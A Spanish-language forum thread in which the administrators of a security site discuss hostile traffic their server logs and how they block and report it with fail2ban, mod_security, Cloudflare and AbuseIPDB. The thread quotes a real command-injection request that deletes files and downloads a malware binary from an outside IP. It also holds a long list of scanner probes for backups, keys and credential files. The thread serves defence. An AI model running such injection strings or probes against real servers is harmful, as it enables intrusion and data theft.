GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Danielㅤ · 6 Enero 2021, 15:14 PM

Bien brujo, me alegro que estés mejorando la seguridad del foro

Saludos

Xyzed · 7 Enero 2021, 04:46 AM

Qué locura, así es en varios proovedores, ni bien levantas un servidor automáticamente te llegan solicitudes raras.
@[D]aniel, a lo que te referís es una especie de honeypot

Danielㅤ · 7 Enero 2021, 13:54 PM

Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como

StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage

Saludos

Xyzed · 7 Enero 2021, 18:07 PM

Cita de: [D]aniel en 7 Enero 2021, 13:54 PM
Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage

Saludos

Muy interesante, gracias por la información.

Danielㅤ · 8 Enero 2021, 19:28 PM

CitarGET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Cuándo yo tenía mi foro tenía solicitudes como esas y lo que hacía algunas veces era entrar a esas URL pero desde un script en python nunca del navegador (excepto si usaba view-source:URL) y hasta usaba un proxy anónimo o después cambiaba la IP, cuando entraba en esa dirección guardaba la salida de la descarga en un archivo txt y lo analizaba, algunas veces encontraba código javascript con una redirección a otra URL o a otra IP, pero quería ver el destino, que es lo que realmente quería el atacante que descargue el servidor, y eran script en bash, perl o python, incluso hasta algunos eran en javascript, supongo que javascript para inyectar código malicioso en archivos PHP.

La verdad es interesante ver a dónde van y que contiene lo que te quieren hacer descargar, se puede aprender de esos códigos porque muchos son códigos privados que solo los atacantes los crean, no están publicados, se puede aprender la forma que utilizan para infectar, para no ser detectados, te hacen descargar cosas, instalarlas o llevarte datos de tu servidor al suyo y después borrar todo, por ejemplo borrar los logs, ademas he llegado a ver hasta códigos en reverso y después lo invertian y los ejecutaban, incluso hasta usaban varios lenguajes, por ejemplo te querían descargar en el servidor un archivo bash pero este a su vez descargaba uno en Python y desde Python ejecutaban otro en Perl.

También en esos códigos se podía ver cómo hacían todas las instrucciones y después borraban todo automáticamente para no dejar rastros, pero las formas y métodos que usaban eran interesante, lo mismo con los códigos que los programaban para que hagan tal cosa y realmente hasta sorprendía la forma que utilizaban de lograr lo que querían, todo eso lo analizaba y aprendía.

Otras veces cuando miraba el log de accesos veía como inventaban el URL Referer, ponían páginas o direcciones de IP con datos para que me interese y acceda, como si fuera que en tal dominios o IPs habían datos de mi foro o algo por el estilo, y analizaba esas direcciones desde modo raw mostrando por consola lo que había en el destino o guardaba la salida en un txt y lo miraba, y casi siempre eran puros virus para que los descargue desde el navegador apenas entre a esa dirección, de todas maneras yo usaba Firefox última versión, tenía todas las actualizaciones de Windows, tenía de firewall Comodo, además de Malwarebytes analizando todo el tiempo y también el Malwarebytes anti-rootkit, etc.

Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Llegué a ver también que en los archivos por ejemplo de Python usaban números chars (por ejemplo chr(99)) y estos los unian para formar comandos y así ejecutarlos.

Saludos

el-brujo · 9 Enero 2021, 00:06 AM

Quizás sea una buena idea reportar automáticamente las ip's a alguna servicio de terceros. He visto que hay varios servicios (un montón), cuando buscas por Google por una IP maliciosa ya aparecen los reportes y demás.

Los intentos fallidos de fail2ban por ssh son alarmantes xD

CitarOtras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Hay una regla en CloudFlare para bloquear los bots falsos, ip's que no pertenecen al rango de bots de Google y la tenemos activada

Acabaré haciendo el log del mod_security público y en tiempo real. Ví que habia un panel de control para mod_security pero sólo para Plesk.

El WAF de CloudFLare no para de trabajar, pero ni en versión de pago se pueden bajar o descargar los logs de registro, lo cuál es una pena.

Danielㅤ · 9 Enero 2021, 14:20 PM

Si es buena idea reportar esas IPs maliciosas, de hecho esta misma petición ya aparece en Google, ya lo han reportado en varios sitios:

https://www.google.com.ar/search?&q=Re%3A+GET+%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B*%3Bwget%2B185.172.111.214%2Fbins%2FUnHAnaAW.x86

En mí servidor VPS no disponía de CloudFlare.

Eso estamos esperando el reporte completo del log del mod_security

Saludos

el-brujo · 11 Enero 2021, 13:32 PM

Muy divertido también ver todas las peticiones no encontradas.

La mayoría en busca de scripts de wordpress y copias de seguridad:

Errores 404

Código [Seleccionar]

/config.bak.php
/admin.php
/admin/index.php 
/phpMyAdmin/ 
/app/etc/local.xml 
/phpmyadmin/ 
/shell.php 
/wp-content/uploads/ 
/admin/logs/errors.log 
/backup.sql 
/database.sql 
/db.sql 
/m.php 
/localhost.sql 
/mysql.sql
/.ksh_history
/.zsh_history
/dbdump.sql
/.env.development.local 
elhacker.net.sq
/backup.sql.gz
/server.key
/key.pem
/www.key 
/elhacker.net.sql.gz 
/mysqldump.sql 
/wp-content/uploads/upload_index.php 
/wp-content/backup-db/ 
/www.elhacker.net.sql.gz 
/phpinfo.php 
/elhacker.net.tar.gz 
/my.key 2 -
/site.sql 2 -
/elmah.axd 2 -
/www.tar.gz
/backup.rar
/www.elhacker.net.tar.gz 
/privatekey.key 
/db_backup.sql 
/.env.prod.local 2 -
/.env.production.local 2 -
/temp.sql 2 -
/www.elhacker.net.gz 2 -
/translate.sql 2 -
/api/api-browser/ 2 -
/wp-content/uploads/dump.sql 2 -
/www.elhacker.net.7z
/back/bak.zip
/_DB_.tar.gz 
/old/bak.tar.gz
/backup-localhost.sql.gz 
/www.elhacker.net.db 
/backup/bak.tar.gz 
/bak/www.sql 1 -
/restore/directory.tar.gz 1 -
/bak/directory.zip 1 -
/restore/elhacker.net.gz 1 -
/wp-content/plugins/three-column-screen-layout/db.php 1 -
/elhacker.tar.gz
/localhost-dump.sql.gz 1 -
/inc/database.php.bck 1 -
/elhackerdb.sql 1 -
/elhacker.net.xz 1 -
/_DB_.sql.zip
/dump.rar 1 -
/back/backup.gz
/www.elhacker.net.pem 1 -
/old/website.rar 1 -
/elhacker.net.sql.tar.gz 1 -
/wordpress/wp-config.php~ 1 -
/webadmin.php 1 -
/backup/backup.tar.gz 1 -
/old/www.tar.gz
/backups/elhacker.net.gz 1 -
/wp-content/plugins/wp-1ogin_bak.php 1 -
/elhacker.net.sql.tar.z
/restore/backup.tar.gz 1 -
/backup.tgz 1 -
/restore/.well-known.zip 1 -
/js/mage/adminhtml/sales.js 1 -
/elhacker.bck.sql
/www.elhacker.net.tar 1 -
/old/backup.gz 1 -
/elhacker.gz
/inc/config.php.bck 1 -
/backup/elhacker.net.zip 1 -
/backup/www.zip 1 -
/localhost_database.sql.gz
elhacker.net.bak.sql 1 -
/back/backup.tar.gz 1 -
/restore/directory.gz 1 -
/backupelhacker.net.sql 1 -
/localhost-db.sql.gz 1 -
/backups/www.gz 1 -
/elhacker_backup.gz
/backup.ibz 1 -
/www.elhacker.tar 1 -
/bak.rar 1 -
/db_backup.elhacker.sql.gz 1 -
/localhostbackup.sql.gz
//backup/wp-admin/install.php 1 -
/administrator/index.php 1 -
/backups/backup.tar.gz 1 -
/restore/website.tar.gz
/back/credentials.txt 1 -
/backupelhacker.net.sql.gz 1 -
/back/www.gz 1 -
/bak/sql.sql
/bak/website.tar.gz 1 -
/bak/www.gz
/site.tgz 1 -
/backups/elhacker.net.tar.gz 1 -
/localhost_db.sql.gz 1 -
/public_html.tar
/elhacker.net.z 1 -
/localhost_dump.sql 1 -
/conf/database.bck 1 -
/site.rar 1 -
/elhacker.net.sql.zip
/backups/www.rar
/htodcs.rar 1 -
/elhacker.sql 1 -
/elhacker.net_database.sql
/backup/backup.bz2 1 -
/elhacker_backup.tgz 1 -
/restore/elhacker.net.rar
/web.rar 1 -
/home.tar 1 -
/back/elhacker.net.zip
/elhacker.net.bck 1 -
/bak/elhacker.net.sql
www.elhacker.net.sql.bz2 1 -
/backup.backup
/db.php.bck 1 -
/elhacker.net-backup.sql.gz 1 -
/elhacker.bck
/back/sql.sql 1 -
/conf/config.php.bck
elhacker.net_dump.sql 1 -
/elhacker_db.sql 1 -
/elhacker.net_db.sql 1 -
/backups/bak.zip 1 -
/conf.gz
[..]

Danielㅤ · 11 Enero 2021, 14:04 PM

jajaja pues si, hay solicitudes hasta de quererse descargar el sitio entero:

Código [Seleccionar]


elhacker.net.tar.gz
backup.rar
www.elhacker.net.tar.gz 
www.elhacker.net.gz 
www.elhacker.net.7z
elhacker.tar.gz
[...]

aunque también hay de quererse descargar bases de datos y hasta credenciales de acceso.

Saludos

el-brujo · 14 Enero 2021, 00:04 AM

Finalmente voy a usar AbuseIPDB para reportar las IP's de ataques hacking mod_security y brute-force login ssh y ftp vía fail2ban

Ya tengo la API creada y empezaré a reportar en breve. El límite son 3.000 ip's diarias xD

Integrating AbuseIPDB with Fail2Ban - Automatically Report Bad IPs
https://www.abuseipdb.com/fail2ban.html

Instalar y configurar Fail2ban
https://blog.elhacker.net/2014/05/instalar-y-configurar-fail2ban.html